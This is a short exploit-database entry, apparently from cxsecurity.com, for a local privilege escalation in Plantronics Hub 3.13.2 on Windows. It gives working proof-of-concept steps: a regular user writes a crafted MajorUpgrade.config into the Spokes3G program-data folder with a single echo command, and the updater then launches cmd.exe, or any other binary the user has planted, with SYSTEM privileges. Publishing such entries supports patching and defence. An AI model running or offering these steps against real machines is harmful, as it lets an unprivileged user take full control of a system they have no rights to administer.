Plantronics Hub 3.13.2 Local Privilege Escalation

2020-01-05 / 2020-01-04
Credit: Markus Krell
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Plantronics Hub 3.13.2 - Local Privilege Escalation # Date: 2020-01-2 # Exploit Author: Markus Krell - @MarkusKrell # Vendor Homepage: https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf # Software Link: https://www.plantronics.com/content/dam/plantronics/software/PlantronicsHubInstaller-3.13.2.exe # Version: Plantronics Hub for Windows prior to version 3.14 # Tested on: Windows 10 Enterprise # CVE : N/A As a regular user drop a file called "MajorUpgrade.config" inside the "C:\ProgramData\Plantronics\Spokes3G" directory. The content of MajorUpgrade.config should look like the following one liner: <WINDOWS-USERNAME>|advertise|<FULL-PATH-TO-YOUR-DESIRED-PAYLOAD> Exchange <WINDOWS-USERNAME> with your local (non-administrative) username. Calling cmd.exe is the most basic exploitation, as it will spawn a system shell in your (unprivileged) windows session. You may of course call any other binary you can plant on the machine. Steps for exploitation (PoC): - Open cmd.exe - Navigate using cd C:\ProgramData\Plantronics\Spokes3G - echo %username%^|advertise^|C:\Windows\System32\cmd.exe > MajorUpgrade.config


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top